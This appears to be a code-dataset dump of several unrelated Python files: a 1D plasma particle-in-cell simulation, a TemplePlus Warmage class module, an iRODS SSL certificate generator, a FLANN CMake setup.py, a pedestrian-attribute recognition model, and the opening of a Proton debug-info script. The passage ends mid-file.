id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
5146746 | <reponame>timsliu/platypus
# pic_1d.py
# 1D particle in cell plasma simulation
#
import numpy as np
import copy
from scipy import fft, ifft
import matplotlib.pyplot as plt
MIN_J = 1e-8 # minimum value for index J when building k array (keeps k[0] non-zero so update_phi avoids a divide-by-zero)
class PIC_1D:
    """1D electrostatic particle-in-cell (PIC) plasma simulation.

    Mobile electron macroparticles move over a stationary ion background on
    a periodic 1D grid.  Each step deposits charge onto cell centers, solves
    the potential spectrally, differences it to get the electric field on
    the nodes, and pushes the particles.
    """

    def __init__(self, params):
        """Allocate state arrays and read domain parameters from *params*.

        params (dict) - requires "seed", "dx", "timestep", "steps", "cells",
        "n_particles"; optional "two_stream"/"single_stream"/"landau"
        sub-dicts are read by the corresponding initializers.
        """
        # TODO verify it's a valid params set
        # random seed
        np.random.seed(params["seed"])
        self.params = params
        # domain parameters
        self.dx = params["dx"]
        self.dt = params["timestep"]
        self.steps = params["steps"]                    # time steps to run for
        self.cells = params["cells"]                    # number of cells
        self.nodes = [x + 1 for x in params["cells"]]   # nodes bound the cells
        self.n_particles = params["n_particles"]        # total number of particles
        self.xmax = self.dx[0] * self.cells[0]
        self.particle_weight = 1/(self.n_particles/np.prod(self.cells))  # density/particles per cell
        # state information
        self.electron_x = np.zeros(self.n_particles)    # electron positions
        self.electron_v = np.zeros(self.n_particles)    # electron velocities
        self.electron_e = np.zeros(self.n_particles)    # e-field at particles
        self.ion_x = np.zeros(self.n_particles)         # ion positions
        self.ion_v = np.zeros(self.n_particles)         # ion velocities
        self.ne = np.zeros(self.cells)                  # electron number density at each cell
        self.ni = np.zeros(self.cells)                  # ion number density at each cell
        self.rho = np.zeros(self.cells)                 # charge density at each cell center
        self.phi = np.zeros(self.cells)                 # potential at cell centers
        self.batch = []                                 # batch of particles to follow
        # field quantities on nodes
        self.e = np.zeros(self.nodes)                   # electric field at each node
        # dict of lists holding output time series
        self.output = {
            "electrostatic_energy": [],
            "kinetic_energy": [],
            "batch_ke": []
        }

    def init_x_random(self):
        '''randomly initialize the positions of the macroparticles'''
        self.electron_x = np.random.rand(self.n_particles) * self.xmax
        self.ion_x = np.random.rand(self.n_particles) * self.xmax
        return

    def init_x_uniform(self):
        '''uniformly initialize the positions of the macroparticles'''
        self.electron_x = np.linspace(0, self.xmax, num=self.n_particles, endpoint=False)
        self.ion_x = np.linspace(0, self.xmax, num=self.n_particles, endpoint=False)
        return

    def init_v_maxwellian(self):
        '''initializes the velocity distribution function as a maxwellian;
        electrons get sqrt(-ln r1) * cos(2*pi*r2), ions stay cold'''
        for i in range(self.n_particles):
            r1 = max(1e-8, np.random.rand())  # clamp so log() is finite
            r2 = np.random.rand()
            self.electron_v[i] = np.sqrt(-np.log(r1)) * np.cos(2 * np.pi * r2)
            self.ion_v[i] = 0
        return

    def init_v_two_stream(self):
        '''initializes the velocity distribution of electrons as two
        counter propagating streams
        inputs (from params["two_stream"]):
            vpos - normalized velocity of positive beam
            vneg - normalized velocity of negative beam'''
        vpos = self.params["two_stream"]["vpos"]
        vneg = self.params["two_stream"]["vneg"]
        # randomly select which half is positive
        pos_particles = np.random.choice(
            range(self.n_particles),
            size=int(self.n_particles/2),
            replace=False)
        # iterate through particles and set the velocities
        for i in range(self.n_particles):
            if i in pos_particles:
                self.electron_v[i] = vpos
            else:
                self.electron_v[i] = vneg
            self.ion_v[i] = 0
        return

    def init_v_single_stream(self):
        '''randomly sets a certain fraction of electrons to an identical
        velocity, simulating a single stream
        inputs (from params["single_stream"]):
            stream_frac - percent of particles to set velocity
            stream_v - normalized velocity'''
        fraction = self.params["single_stream"]["stream_frac"]
        v = self.params["single_stream"]["stream_v"]
        # randomly select which particles belong to the stream
        stream_particles = np.random.choice(
            range(self.n_particles),
            size=int(self.n_particles * fraction),
            replace=False)
        self.batch = stream_particles  # follow the stream in the diagnostics
        # iterate through particles and set the velocities
        for i in range(self.n_particles):
            if i in stream_particles:
                self.electron_v[i] = v
        return

    def density_perturbation(self):
        '''create a sinusoidal density perturbation by displacing electrons
        inputs (from params["landau"]):
            amplitude - perturbation amplitude delta_n
            mode - wave number k of the perturbation'''
        delta_n = self.params["landau"]["amplitude"]
        k = self.params["landau"]["mode"]
        for i in range(self.n_particles):
            delta_x = delta_n/k * np.sin(k * self.electron_x[i])
            self.electron_x[i] += delta_x
            # wrap displaced particles back into the periodic domain
            while self.electron_x[i] < 0:
                self.electron_x[i] += self.xmax
            while self.electron_x[i] > self.xmax:
                self.electron_x[i] -= self.xmax

    def update_ni(self):
        '''update the ion density in each cell'''
        self.update_n("ion")
        return

    def update_ne(self):
        '''update the electron density in each cell'''
        self.update_n("electron")
        return

    def update_n(self, particle_type):
        '''update the particle density using linear (CIC) weighting
        particle_type (str) - "ion" or "electron"
        raises ValueError for any other particle_type'''
        # copy the particle array we're interested in
        if particle_type == "electron":
            particle_x = np.copy(self.electron_x)
        elif particle_type == "ion":
            particle_x = np.copy(self.ion_x)
        else:
            # fixed: original format string had no placeholder, so the bad
            # value never appeared in the message
            raise ValueError("Unrecognized particle type: {0}".format(particle_type))
        # clear the array of densities
        densities = np.zeros(self.cells[0])
        for x_n in particle_x:
            # cell the particle is in
            cell = int(np.floor(x_n/self.dx[0]))
            # find indices of cells to the left and right that the weight
            # will be distributed between
            # particle is to the right of cell midpoint
            if x_n > cell * self.dx[0] + 0.5 * self.dx[0]:
                cell_left = cell
                cell_right = cell + 1
            # particle is to the left of cell midpoint
            else:
                cell_left = cell - 1
                cell_right = cell
            # center of left and right cells
            cell_left_x = cell_left * self.dx[0] + 0.5 * self.dx[0]
            cell_right_x = cell_right * self.dx[0] + 0.5 * self.dx[0]
            # weight to be distributed to left and right cells; the two
            # weights always sum to particle_weight
            weight_left = (cell_right_x - x_n)/self.dx[0] * self.particle_weight
            weight_right = (x_n - cell_left_x)/self.dx[0] * self.particle_weight
            # get actual cell index, accounting for wraparound
            cell_left = cell_left % self.cells[0]
            cell_right = cell_right % self.cells[0]
            densities[cell_left] += weight_left
            densities[cell_right] += weight_right
        # copy the cell densities to the appropriate array
        if particle_type == "electron":
            self.ne = copy.deepcopy(densities)
        if particle_type == "ion":
            self.ni = copy.deepcopy(densities)
        return

    def update_rho(self):
        '''update the charge density'''
        raw_rho = self.ni - self.ne           # charge density
        self.rho = raw_rho - np.mean(raw_rho) # normalize charge density
        return

    def update_phi(self):
        '''update the electric potential at each cell center with a
        spectral (FFT) Poisson solve on the periodic grid'''
        R = fft(-self.rho)  # fft of rho deviation
        # build intermediate k array; MIN_J keeps k[0] non-zero so the
        # division by kappa**2 below is finite
        k = np.zeros(self.cells[0])
        for j in range(self.cells[0]):
            k[j] = np.pi/self.dx[0] * max(j, MIN_J)/(self.cells[0]/2)
            if j >= self.cells[0]/2:
                k[j] -= 2 * np.pi/self.dx[0]
        # intermediate kappa array (finite-difference-consistent wavenumber)
        kappa = np.sin(k * self.dx[0]/2)/(self.dx[0]/2)
        # intermediate Y array
        Y = - R/(kappa * kappa)
        Y_hat = ifft(Y)
        potential = np.real(Y_hat)  # potential is the real part
        avg_potential = np.mean(potential)
        self.phi = (potential - avg_potential)
        return

    def update_e(self):
        '''update electric field at each node by differencing the potential
        of the two adjacent cells (periodic boundaries)'''
        for i in range(self.nodes[0]):
            if i == 0:
                # use the left potential boundary condition
                left_potential = self.phi[-1]
            else:
                left_potential = self.phi[i-1]
            if i == (self.nodes[0] - 1):
                # use the right potential boundary condition
                right_potential = self.phi[0]
            else:
                right_potential = self.phi[i]
            # E = -(phi_i - phi_i-1)/dx
            self.e[i] = -(right_potential - left_potential)/self.dx[0]
        return

    def update_v(self):
        '''update velocity of particles based on the electric field
        interpolated linearly from the two surrounding nodes'''
        for i in range(self.n_particles):
            x_n = self.electron_x[i]
            # indices of left and right nodes
            node_left = int(np.floor(x_n/self.dx[0]))
            node_right = int(np.ceil(x_n/self.dx[0]))
            # NOTE(review): when x_n lies exactly on a node, floor == ceil and
            # both interpolation weights below are zero, giving e_particle = 0
            # instead of the node field -- confirm whether this measure-zero
            # case matters for the intended resolutions.
            # electric field at the left and right nodes
            e_left = self.e[node_left]
            e_right = self.e[node_right]
            # position of left and right nodes
            x_left = node_left * self.dx[0]
            x_right = node_right * self.dx[0]
            # calculate electric field at particle and update velocity
            e_particle = (x_right - x_n)/self.dx[0] * e_left + (x_n - x_left)/self.dx[0] * e_right
            self.electron_v[i] -= e_particle * self.dt

    def update_x(self):
        '''update position of particles based on v_(n + 0.5)'''
        for i in range(self.n_particles):
            self.electron_x[i] += self.electron_v[i] * self.dt
            # particle past boundary condition; circular boundary
            while self.electron_x[i] < 0:
                self.electron_x[i] += self.xmax
            while self.electron_x[i] > self.xmax:
                self.electron_x[i] -= self.xmax
        return

    def calc_bulk_u(self):
        '''calculate and save the bulk velocity'''
        # TODO
        return

    def calc_electrostatic_energy(self):
        '''calculate and save the electrostatic energy (0.5 * dx * E^2
        summed over cells, with E averaged from the bounding nodes)'''
        electrostatic_energy = 0
        for i in range(self.cells[0]):
            e_cell = np.mean([self.e[i], self.e[i + 1]])  # average E field in cell
            electrostatic_energy += 0.5 * self.dx[0] * (e_cell ** 2)
        # save the value
        self.output["electrostatic_energy"].append(electrostatic_energy)

    def calc_kinetic_energy(self):
        '''calculate and save the kinetic energy of all electrons'''
        ke_energy = 0.5 * self.particle_weight * sum(self.electron_v * self.electron_v)
        # multiply by ratio of potential energy to kinetic energy so total
        # energy is constant
        ke_energy *= np.prod(self.dx)
        self.output["kinetic_energy"].append(ke_energy)
        return

    def calc_batch_kinetic_energy(self):
        '''calculate and save the kinetic energy of the followed batch'''
        ke_energy = 0.0
        for i in self.batch:
            ke_energy += 0.5 * self.particle_weight * self.electron_v[i] * self.electron_v[i]
        ke_energy *= np.prod(self.dx)
        self.output["batch_ke"].append(ke_energy)
        return

    def step(self):
        '''run the simulation for a single step, updating all parameters;
        methods for saving outputs must be called separately'''
        self.update_ni()   # calculate e and i number densities
        self.update_ne()
        self.update_rho()  # update charge density
        self.update_phi()  # calculate cell potential
        self.update_e()    # calculate electric field at nodes
        self.update_v()    # calculate velocity of each particle
        self.update_x()    # update positions

    def spectate(self):
        '''print velocity, position, electric field of a particle'''
        print("x: {:.3f}, v: {:.3f}, e_left: {:.3f}, e_right: {:.3f}".format(
            float(self.electron_x[10]),
            float(self.electron_v[10]),
            float(self.e[int(np.floor(self.electron_x[10]/self.dx[0]))]),
            float(self.e[int(np.ceil(self.electron_x[10]/self.dx[0]))])))
| StarcoderdataPython |
8189760 | <reponame>edoipi/TemplePlus
from templeplus.pymod import PythonModifier
from toee import *
import tpdp
import char_class_utils
###################################################
def GetConditionName():
    """Return the name under which this class condition is registered."""
    condition_name = "Warmage"
    return condition_name
# announce registration when the modifier loader parses this module (Py2 print)
print "Registering " + GetConditionName()

classEnum = stat_level_warmage  # engine stat enum identifying the Warmage class
classSpecModule = __import__('class047_warmage')  # companion class-spec module (spell selection logic)
###################################################
#### standard callbacks - BAB and Save values
def OnGetToHitBonusBase(attachee, args, evt_obj):
    """Add the warmage's class base attack bonus to the to-hit bonus list."""
    warmage_levels = attachee.stat_level_get(classEnum)
    bab = game.get_bab_for_class(classEnum, warmage_levels)
    evt_obj.bonus_list.add(bab, 0, 137)  # untyped, description: "Class"
    return 0
def OnGetSaveThrowFort(attachee, args, evt_obj):
    """Add the warmage's Fortitude save progression to the bonus list."""
    fort_bonus = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Fortitude)
    evt_obj.bonus_list.add(fort_bonus, 0, 137)  # untyped, description: "Class"
    return 0
def OnGetSaveThrowReflex(attachee, args, evt_obj):
    """Add the warmage's Reflex save progression to the bonus list."""
    reflex_bonus = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Reflex)
    evt_obj.bonus_list.add(reflex_bonus, 0, 137)  # untyped, description: "Class"
    return 0
def OnGetSaveThrowWill(attachee, args, evt_obj):
    """Add the warmage's Will save progression to the bonus list."""
    will_bonus = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Will)
    evt_obj.bonus_list.add(will_bonus, 0, 137)  # untyped, description: "Class"
    return 0
# register the class condition and wire up the standard BAB / save hooks
classSpecObj = PythonModifier(GetConditionName(), 0)
classSpecObj.AddHook(ET_OnToHitBonusBase, EK_NONE, OnGetToHitBonusBase, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_FORTITUDE, OnGetSaveThrowFort, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_REFLEX, OnGetSaveThrowReflex, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_WILL, OnGetSaveThrowWill, ())
### Spell casting
def OnGetBaseCasterLevel(attachee, args, evt_obj):
    """Contribute caster levels when the queried class is Warmage."""
    if evt_obj.arg0 == classEnum:
        warmage_levels = attachee.stat_level_get(classEnum)
        evt_obj.bonus_list.add(warmage_levels, 0, 137)
    return 0
def OnLevelupSpellsFinalize(attachee, args, evt_obj):
    """Commit the level-up spell selection for the warmage class."""
    if evt_obj.arg0 == classEnum:
        classSpecModule.LevelupSpellsFinalize(attachee)
    return 0
def OnInitLevelupSpellSelection(attachee, args, evt_obj):
    """Initialize the level-up spell selection UI for the warmage class."""
    if evt_obj.arg0 == classEnum:
        classSpecModule.InitSpellSelection(attachee)
    return 0
def OnLevelupSpellsCheckComplete(attachee, args, evt_obj):
    """Report whether the warmage spell selection is complete."""
    if evt_obj.arg0 != classEnum:
        return 0
    selection_ok = classSpecModule.LevelupCheckSpells(attachee)
    if not selection_ok:
        evt_obj.bonus_list.add(-1, 0, 137)  # denotes incomplete spell selection
    return 1
# wire up the spell-casting related hooks on the class condition
classSpecObj.AddHook(ET_OnGetBaseCasterLevel, EK_NONE, OnGetBaseCasterLevel, ())
classSpecObj.AddHook(ET_OnLevelupSystemEvent, EK_LVL_Spells_Finalize, OnLevelupSpellsFinalize, ())
classSpecObj.AddHook(ET_OnLevelupSystemEvent, EK_LVL_Spells_Activate, OnInitLevelupSpellSelection, ())
classSpecObj.AddHook(ET_OnLevelupSystemEvent, EK_LVL_Spells_Check_Complete, OnLevelupSpellsCheckComplete, ())
#Light Shield Proficiency
def HasLightShieldProficency(attachee, args, evt_obj):
    """Answer the light-shield proficiency query affirmatively.

    The misspelled name is load-bearing: it is registered by string in the
    query hook below and must not be renamed.
    """
    evt_obj.return_val = 1
    return 0
# Light Shield Proficiency feat condition; the misspelled query string below
# ("Proficency") is intentional -- it must match the name callers query with.
lightShieldProficiency = PythonModifier("Light Shield Proficiency", 2) #Spare, Spare
lightShieldProficiency.MapToFeat("Light Shield Proficiency")
lightShieldProficiency.AddHook(ET_OnD20PythonQuery, "Has Light Shield Proficency", HasLightShieldProficency, ())
# Warmage Edge
# Here is how this complicated ability is implemented. First, the bonus is increased by a critical
# hit but not by Empower Spell. Second, multi-target spells only get the benefit once; this affects
# the first target that takes damage. Third, area-of-effect spells get the benefit once against each
# object in their area of effect (ice storm, for example, only gets the bonus on the bludgeoning
# damage). Fourth, multi-round spells can get the benefit each round.
def WarmageBeginRound(attachee, args, evt_obj):
    """Clear the remembered spell id (arg 0) at the start of each round."""
    args.set_arg(0, 0)
    return 0
def WarmageEdgeOnSpellDamage(attachee, args, evt_obj):
    """Apply the Warmage Edge bonus (INT modifier) to qualifying spell damage.

    arg 0 stores the spell id that most recently received the bonus, so a
    multi-target spell only benefits once; single targets are tagged with a
    "Warmage Edge Damage" marker condition instead.
    """
    # Only affects warmage spells
    spellCastingClass = evt_obj.spell_packet.get_spell_casting_class()
    if spellCastingClass != stat_level_warmage:
        return 0
    prevSpellID = args.get_arg(0)
    spellID = evt_obj.spell_packet.spell_id
    spEntry = tpdp.SpellEntry(evt_obj.spell_packet.spell_enum)
    multiTarget = spEntry.is_base_mode_target(MODE_TARGET_MULTI)
    target = evt_obj.target
    if multiTarget:
        # If the same multi-target spell is doing damage again, no bonus
        if prevSpellID == spellID:
            return 0
    elif evt_obj.spell_packet.spell_enum != spell_melfs_acid_arrow:  # Always give the bonus to acid arrow
        if target.d20_query_with_data("Warmage Edge Damage Taken", spellID):
            return 0
    # fixed: local was named `int`, shadowing the builtin
    intScore = attachee.stat_level_get(stat_intelligence)
    # floor division keeps Python 2 integer semantics if run under Python 3
    intMod = (intScore - 10) // 2
    # Increase warmage edge damage on a critical hit
    if evt_obj.damage_packet.critical_multiplier > 1:
        intMod = intMod * 2
    if intMod > 0:
        evt_obj.damage_packet.bonus_list.add_from_feat(intMod, 0, 137, "Warmage Edge")
    args.set_arg(0, spellID)
    target.condition_add_with_args("Warmage Edge Damage", spellID)
    return 0
# Warmage Edge feat condition: arg 0 remembers the last spell id rewarded
warmageEdge = PythonModifier("Warmage Edge", 2) #Previous Spell ID, Spare
warmageEdge.MapToFeat("Warmage Edge")
warmageEdge.AddHook(ET_OnDispatchSpellDamage, EK_NONE, WarmageEdgeOnSpellDamage, ())
warmageEdge.AddHook(ET_OnBeginRound, EK_NONE, WarmageBeginRound, ())
#Warmage edge damage effect
def WarmageDamageBeginRound(attachee, args, evt_obj):
    """Expire the marker condition: it always disappears at the beginning
    of the round. (The unused read of arg 0 was removed.)"""
    args.condition_remove()
    return 0
def TakenWarmageEdgeDamageFromSpellQuery(attachee, args, evt_obj):
    """Query handler: has this spell id already dealt Warmage Edge damage
    to the attachee? Sets return_val to 1 on a match."""
    if args.get_arg(0) == evt_obj.data1:
        evt_obj.return_val = 1
    return 0
# one-round marker condition placed on targets hit by Warmage Edge
warmageEdgeDamage = PythonModifier("Warmage Edge Damage", 2, False) #Previous Spell ID, Spare
warmageEdgeDamage.AddHook(ET_OnBeginRound, EK_NONE, WarmageDamageBeginRound, ())
warmageEdgeDamage.AddHook(ET_OnD20PythonQuery, "Warmage Edge Damage Taken", TakenWarmageEdgeDamageFromSpellQuery, ())
#Armored Mage
def WarmageSpellFailure(attachee, args, evt_obj):
    """Arcane spell failure handler for the Armored Mage feature.

    Per the checks below: light armor (and medium armor at warmage level 8+,
    or with Improved Armored Casting) and light shields/bucklers add no spell
    failure; anything else contributes the item's normal arcane failure chance.
    """
    # Only affects spells cast as a warmage
    if evt_obj.data1 != classEnum:
        return 0
    equip_slot = evt_obj.data2
    item = attachee.item_worn_at(equip_slot)
    if item == OBJ_HANDLE_NULL:
        return 0
    if equip_slot == item_wear_armor: # warmage can cast in light armor (and medium armor at level 8 or greater) with no spell failure
        warmageLevel = attachee.stat_level_get(stat_level_warmage)
        armor_flags = item.obj_get_int(obj_f_armor_flags)
        # NOTE(review): `armor_flags & ARMOR_TYPE_NONE` is a bitwise test while
        # the other armor checks use equality; if ARMOR_TYPE_NONE is 0 the term
        # is always false -- confirm the engine's flag values.
        if attachee.d20_query("Improved Armored Casting"):
            if (armor_flags & ARMOR_TYPE_NONE) or (armor_flags == ARMOR_TYPE_LIGHT) or (armor_flags == ARMOR_TYPE_MEDIUM) or (warmageLevel > 7):
                return 0
        else:
            if (armor_flags & ARMOR_TYPE_NONE) or (armor_flags == ARMOR_TYPE_LIGHT) or ((armor_flags == ARMOR_TYPE_MEDIUM) and (warmageLevel > 7)):
                return 0
    if equip_slot == item_wear_shield: # warmage can cast with a light shield (or buckler) with no spell failure
        shieldFailure = item.obj_get_int(obj_f_armor_arcane_spell_failure)
        if shieldFailure <= 5: #Light shields and bucklers have 5% spell failure
            return 0
    # otherwise the item's full arcane spell failure applies
    evt_obj.return_val += item.obj_get_int(obj_f_armor_arcane_spell_failure)
    return 0
# Armored Mage feature condition: intercepts the arcane-spell-failure query
armoredMage = PythonModifier("Warmage Armored Mage", 2) #Spare, Spare
armoredMage.MapToFeat("Warmage Armored Mage")
armoredMage.AddHook(ET_OnD20Query, EK_Q_Get_Arcane_Spell_Failure, WarmageSpellFailure, ())
| StarcoderdataPython |
3599176 | <filename>Curso/ExMundo2/Ex040ElIf5Media.py
# Read two grades, average them, and report the student's standing:
# >= 7 approved, < 5 failed, otherwise make-up exam.
nota1 = float(input('Digite a primeira nota: '))
nota2 = float(input('Digite a segunda nota: '))
media = (nota1 + nota2) / 2
if media < 5:
    print('Sua média é {:.1f} e portanto você está reprovado'.format(media))
elif media < 7:
    print('Sua média é {:.1f} e portanto você está de recuperação'.format(media))
else:
    print('Sua média é {:.1f} e portanto você está aprovado'.format(media))
| StarcoderdataPython |
9613623 | <gh_stars>10-100
#!/usr/bin/env python
from __future__ import print_function
import os
import sys
import socket
import posix
import shutil
from subprocess import (Popen, PIPE)
IRODS_SSL_DIR = '/etc/irods/ssl'  # destination for the generated key, cert and DH params
def create_ssl_dir():
    """Generate a self-signed SSL setup (RSA key, certificate, DH params)
    inside IRODS_SSL_DIR by shelling out to openssl.

    Returns the directory listing on success; returns None implicitly when
    the certificate request fails.
    """
    save_cwd = os.getcwd()
    # run shell commands quietly, capturing both output streams
    silent_run = { 'shell': True, 'stderr' : PIPE, 'stdout' : PIPE }
    try:
        if not (os.path.exists(IRODS_SSL_DIR)):
            os.mkdir(IRODS_SSL_DIR)
        os.chdir(IRODS_SSL_DIR)
        # 2048-bit RSA private key
        Popen("openssl genrsa -out irods.key 2048",**silent_run).communicate()
        with open("/dev/null","wb") as dev_null:
            # answer the interactive certificate prompts via a shell heredoc
            p = Popen("openssl req -new -x509 -key irods.key -out irods.crt -days 365 <<EOF{_sep_}"
                      "US{_sep_}North Carolina{_sep_}Chapel Hill{_sep_}UNC{_sep_}RENCI{_sep_}"
                      "{host}{_sep_}<EMAIL>{_sep_}EOF\n""".format(
                          host = socket.gethostname(), _sep_="\n"),shell=True, stdout=dev_null, stderr=dev_null)
            p.wait()
        if 0 == p.returncode:
            # Diffie-Hellman parameters (generator 2); this can take a while
            Popen('openssl dhparam -2 -out dhparams.pem',**silent_run).communicate()
            return os.listdir(".")
    finally:
        # always restore the caller's working directory
        os.chdir(save_cwd)
def test(opts,args=()):
    """Entry point: (re)create IRODS_SSL_DIR.

    opts - getopt-style option pairs; '-f' forces overwrite without prompting
    args - ignored positional arguments (a warning is printed)
    """
    if args: print ('warning: non-option args are ignored',file=sys.stderr)
    # default answer: proceed automatically only when the dir doesn't exist yet
    affirm = 'n' if os.path.exists(IRODS_SSL_DIR) else 'y'
    # prompt only when interactive, not forced, and the directory exists
    if not [v for k,v in opts if k == '-f'] and affirm == 'n' and posix.isatty(sys.stdin.fileno()):
        try:
            input_ = raw_input   # Python 2
        except NameError:
            input_ = input       # Python 3
        affirm = input_("This will overwrite directory '{}'. Proceed(Y/N)? ".format(IRODS_SSL_DIR))
    if affirm[:1].lower() == 'y':
        shutil.rmtree(IRODS_SSL_DIR,ignore_errors=True)
        print("Generating new '{}'. This may take a while.".format(IRODS_SSL_DIR), file=sys.stderr)
        ssl_dir_files = create_ssl_dir()
        print('ssl_dir_files=', ssl_dir_files)
if __name__ == '__main__':
    import getopt
    # pass parsed (opts, args) straight through; '-f' skips the confirmation
    test(*getopt.getopt(sys.argv[1:],'f')) # f = force
| StarcoderdataPython |
88633 | <gh_stars>0
#!/usr/bin/env python2
import os
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext as build_ext_orig
from distutils.file_util import copy_file
class CMakeExtension(Extension):
    """setuptools Extension placeholder whose build is delegated to CMake.

    No source files are listed; the custom build_ext command below runs
    CMake/make instead of compiling anything itself.
    """

    def __init__(self, name):
        # old-style base-class call kept for Python 2 compatibility
        Extension.__init__(self, name, sources=[])
class build_ext(build_ext_orig):
    """Custom build_ext that builds the native flann library with CMake."""

    def run(self):
        # build every registered extension via CMake instead of a compiler
        for ext in self.extensions:
            self.build_cmake(ext)

    def build_cmake(self, ext):
        """Configure with CMake, build the 'flann' target and copy the
        resulting shared library into the package build directory."""
        self.spawn(['cmake', '.'])
        self.spawn(['make', 'flann'])
        dest = os.path.join(self.build_lib, "pyflann", "libflann.so")
        # NOTE(review): the versioned .so name is hard-coded -- verify it
        # matches the vendored flann version's CMake output.
        copy_file("lib/libflann.so.1.9.1", dest)
# package metadata; the CMake-driven build_ext above produces the native
# libflann shared library bundled with the pyflann package
# (author/email placeholders come from the source as published)
setup(
    name='incoproflann',
    version='1.1',
    description='Fast Library for Approximate Nearest Neighbors',
    author='<NAME>',
    author_email='<EMAIL>',
    license='BSD',
    url='http://www.cs.ubc.ca/~mariusm/flann/',
    packages=['pyflann'],
    ext_modules=[CMakeExtension('pyflann/libflann')],
    package_dir={'pyflann': 'src/python/pyflann'},
    cmdclass={
        'build_ext': build_ext,
    }
)
| StarcoderdataPython |
5020520 | <filename>pardet/models/par_detectors/strongbaseline.py
from collections import OrderedDict
import torch
import torch.nn as nn
from ..builder import CLASSIFIERS, PARNETS, build_bockbone, build_classifier, build_loss
@CLASSIFIERS.register_module()
class BaseClassifier(nn.Module):
    """Attribute head: global average pooling followed by a batch-normalized
    linear layer producing one logit per attribute."""

    def __init__(self, nattr):
        super().__init__()
        self.logits = nn.Sequential(
            nn.Linear(2048, nattr),
            nn.BatchNorm1d(nattr)
        )
        self.avg_pool = nn.AdaptiveAvgPool2d(1)

    def fresh_params(self):
        """All parameters of the head are trained from scratch."""
        return self.parameters()

    def forward(self, feature):
        pooled = self.avg_pool(feature)
        flattened = pooled.view(feature.size(0), -1)
        return self.logits(flattened)
@PARNETS.register_module()
class StrongBaseline(nn.Module):
    """Pedestrian-attribute recognition model: a backbone feature extractor
    plus an attribute classifier head, trained with a weighted loss."""

    def __init__(self, backbone, classifier, loss):
        super(StrongBaseline, self).__init__()
        # sub-modules are constructed from config dicts via registry builders
        self.backbone = build_bockbone(backbone)
        self.classifier = build_classifier(classifier)
        self.loss = build_loss(loss)

    def fresh_params(self):
        """Parameters trained from scratch (the classifier head only)."""
        params = self.classifier.fresh_params()
        return params

    def finetune_params(self):
        """Parameters fine-tuned from pretrained weights (the backbone)."""
        return self.backbone.parameters()

    def extract_feat(self, img):
        """Run the backbone and return its feature map."""
        x = self.backbone(img)
        return x

    def forward_train(self, **kwargs):
        """Training forward pass; returns a dict of loss tensors."""
        feat_map = self.extract_feat(kwargs['img'].cuda())
        logits = self.classifier(feat_map)
        losses = dict()
        loss = self.loss(logits, kwargs['gt_label'].cuda(), kwargs['weights'])
        losses.update(loss)
        return losses

    def forward(self, return_loss=True, **kwargs):
        """Dispatch to the training or test forward pass."""
        if return_loss:
            return self.forward_train(**kwargs)
        else:
            return self.forward_test(**kwargs)

    def train_step(self, data, optimizer, **kwargs):
        """One training iteration's forward computation (runner API)."""
        losses = self(**data, **kwargs)
        loss, log_vars = self._parse_losses(losses)
        outputs = dict(
            loss=loss, log_vars=log_vars, num_samples=len(data['img_name']))
        return outputs

    def val_step(self, data, optimizer, **kwargs):
        """Validation counterpart of train_step (same computation)."""
        losses = self(**data, **kwargs)
        loss, log_vars = self._parse_losses(losses)
        outputs = dict(
            loss=loss, log_vars=log_vars, num_samples=len(data['img_name']))
        return outputs

    def _parse_losses(self, losses):
        """Reduce a dict of loss tensors to (total_loss, scalar log_vars).

        Every key containing 'loss' is summed into the total; all values are
        mean-reduced and converted to Python floats for logging.
        """
        log_vars = OrderedDict()
        for loss_name, loss_value in losses.items():
            if isinstance(loss_value, torch.Tensor):
                log_vars[loss_name] = loss_value.mean()
            elif isinstance(loss_value, list):
                log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value)
            else:
                raise TypeError(f'{loss_name} is not a tensor or list of tensors')
        loss = sum(_value for _key, _value in log_vars.items() if 'loss' in _key)
        log_vars['loss'] = loss
        for loss_name, loss_value in log_vars.items():
            log_vars[loss_name] = loss_value.item()
        return loss, log_vars

    def forward_test(self, **kwargs):
        """Test forward pass; dispatches on the number of augmentations."""
        imgs = kwargs.pop('img')
        num_augs = len(imgs)
        if num_augs == 1:
            return self.simple_test(imgs, **kwargs)
        else:
            return self.aug_test(imgs, **kwargs)

    def simple_test(self, img, **kwargs):
        """Single-augmentation inference: sigmoid probabilities + labels."""
        feat_map = self.extract_feat(img.cuda())
        logit = self.classifier(feat_map)
        prob = torch.sigmoid(logit).detach().cpu().numpy()
        gt_label = kwargs['gt_label'].detach().cpu().numpy()
        result = dict(prob=prob, gt_label=gt_label)
        return result

    def aug_test(self, imgs, **kwargs):
        # TODO: support test augmentation for predefined proposals
        pass
| StarcoderdataPython |
4891674 | <filename>protonfixes/debug.py
""" Prints debug info if the environment variable DEBUG is 1
"""
import os
import sys
import shutil
# pylint: disable=E0611
from .protonmain_compat import protonmain
from .protonversion import PROTON_VERSION
from .logger import log
# force debug logging for everything that follows in this module
os.environ['DEBUG'] = '1'
def show_debug_info():
    """Log assorted runtime information (Python/Proton versions, Proton
    directory, command line, filtered environment) for debugging.

    Steam helper invocations (script evaluation / path queries) are called
    very frequently, so for those only the argv is logged.
    """
    check_args = [
        'iscriptevaluator.exe' in sys.argv[2],
        'getcompatpath' in sys.argv[1],
        'getnativepath' in sys.argv[1],
    ]

    if any(check_args):
        log.debug(str(sys.argv))
        return

    line = '---------------------------------------'
    log.debug('---- begin protontricks debug info ----')
    log.debug('Proton Python Version:')
    log.debug(sys.executable)
    log.debug(sys.version)
    log.debug(line)

    log.debug('System Python Version:')
    try:
        # resolve the 'python' symlink to the real interpreter path
        log.debug(shutil.which(os.readlink(shutil.which('python'))))
    # fixed: was a bare `except:`, which also swallowed SystemExit and
    # KeyboardInterrupt; best-effort fallback behavior is preserved
    except Exception:
        log.debug(shutil.which('python'))
    log.debug(line)

    log.debug('Proton Version:')
    log.debug(PROTON_VERSION)
    log.debug(line)

    log.debug('Proton Directory:')
    log.debug(protonmain.g_proton.base_dir)
    log.debug(line)

    # variables that are noisy or identify the user are not logged
    ignorevars = [
        'SteamUser',
        'OLDPWD',
        'SteamAppUser',
